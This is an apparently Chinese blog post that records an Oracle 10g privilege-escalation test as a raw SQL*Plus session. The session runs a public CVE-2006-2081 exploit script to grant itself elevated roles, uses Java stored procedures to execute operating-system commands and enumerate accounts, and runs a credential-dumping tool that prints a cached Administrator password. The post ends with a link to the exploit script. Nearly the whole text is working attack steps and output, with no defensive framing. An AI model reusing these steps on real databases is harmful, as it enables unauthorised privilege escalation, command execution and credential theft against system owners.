Oracle 10g提权测试

一直想摸索一下orcl提权的方式，今天测试了一下10g，可以成功提权。

C:\wmpub>sqlplus scott/tiger@orcl

SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016

Copyright (c) 1982, 2005, Oracle. All rights reserved.

连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO

SQL> @dbms_exp_ext.sql
[+] dbms_exp_ext.sql exploit (CVE-2006-2081)
[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2

Target username (default TEST): scott

[-] Wait...

程序包已创建。

[-] Building evil package...
原值 6: EXECUTE IMMEDIATE 'GRANT DBA TO &the_user';
新值 6: EXECUTE IMMEDIATE 'GRANT DBA TO scott';

程序包体已创建。

[-] Finishing evil package...

PL/SQL 过程已成功完成。

[-] YOU GOT THE POWAH!!

SQL> select * from user_role_privs;  //提升得到JAVASYSPRIV权限

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT JAVASYSPRIV NO YES NO
SCOTT RESOURCE NO YES NO

SQL> @2.sql //执行系统命令，新建账号密码

Java created.

Function created.

Procedure created.

PL/SQL procedure successfully completed.

grant javasyspriv to system
*
ERROR at line 1:
ORA-01932: ADMIN option not granted for role 'JAVASYSPRIV'

Windows IP Configuration

Ethernet adapter ????:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.9.10.202
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.9.0.1

PL/SQL procedure successfully completed.

User accounts for \\
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0
The command completed with one or more errors.

PL/SQL procedure successfully completed.

SQL>
SQL> exec :x:=run_cmd('D:\temp\GetPass_cmd.exe');  //读取系统缓存的账号密码 
UserName: Administrator
LogonDomain: WIN2003-WVS2
password: abc123!
UserName: NETWORK SERVICE
LogonDomain: NT AUTHORITY
password:
UserName:
LogonDomain:
Specific LUID NOT found
UserName: ANONYMOUS LOGON
LogonDomain: NT AUTHORITY
Specific LUID NOT found
UserName: WIN2003-WVS2$
LogonDomain: WORKGROUP
Specific LUID NOT found

PL/SQL procedure successfully completed.

SQL>

提权脚本：http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql